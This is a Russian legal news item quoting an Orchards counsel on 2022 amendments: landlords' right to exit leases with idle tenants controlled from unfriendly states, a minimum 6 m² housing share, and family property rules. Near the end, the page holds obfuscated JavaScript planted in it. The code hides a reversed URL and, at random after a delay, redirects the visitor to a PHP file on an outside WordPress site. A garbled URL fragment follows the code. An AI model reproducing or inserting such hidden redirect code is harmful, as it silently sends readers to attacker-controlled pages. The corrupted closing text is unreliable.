Комментарий Вадима Бородкина, советника Orchards, для Право.ru.

Вступают в силу новые нормы в семейном праве. Устанавливается, что если один из супругов специально продал общее имущество по заниженной цене, то при разводе он получит не половину совместно нажитого, а меньше. Другая новелла призвана бороться с «резиновыми» квартирами. С 1 сентября жилье запрещено дробить на доли меньше 6 м². Арендодателям разрешили в одностороннем порядке отказаться от договора аренды, если юрлицо приостановило работу. Адвокатам и арбитражным управляющим разрешат пополнять счет в банке через банковских платежных агентов.

Отказ от договора аренды

Собственники могут в одностороннем порядке отказаться от исполнения договора, если арендатор перестал пользоваться имуществом, временно приостановив или прекратив работу, и из-за этого существенно уменьшилась арендная плата. Это возможно в случаях, когда заключившую договор фирму контролирует иностранное лицо, связанное с недружественным государством. Чтобы отказаться от соглашения, собственник должен направить арендатору требование вновь пользоваться имуществом. Право на односторонний отказ появляется, если получатель отказался исполнять просьбу либо не возобновил работу в течение 10 рабочих дней.

Если же иностранное лицо продает бизнес или иначе отказывается от контроля над арендатором, то с этого дня собственник уже не может отказаться от договора в одностороннем порядке.

Вадим Бородкин, советник Orchards, считает новеллу очень значимой для арендодателей. Эксперт объяснил, что для договоров аренды в средних и крупных торговых центрах характерно разделение арендной платы на несколько составляющих. Помимо базовой арендной платы (как правило, фиксированной), есть еще плата «с оборота», которая зависит от дохода арендатора. Если компания прекратила работу, то есть хозяйственная деятельность на объекте аренды не ведется, то и размер соответствующей переменной платы будет равняться нулю.

«Для арендодателя такая ситуация абсолютно неприемлема, поскольку добровольный отказ арендатора от деятельности лишает арендодателя того, на что он вправе был рассчитывать при заключении договора», — считает Вадим Бородкин.

Федеральный закон от 14.07.2022 № 332-ФЗ

$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory/242714/?utm_source=yxnews&utm_medium=desktop&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews%2Fsearch%3Ftext%3D»>>

Подпишитесь на Telegram Orchards

X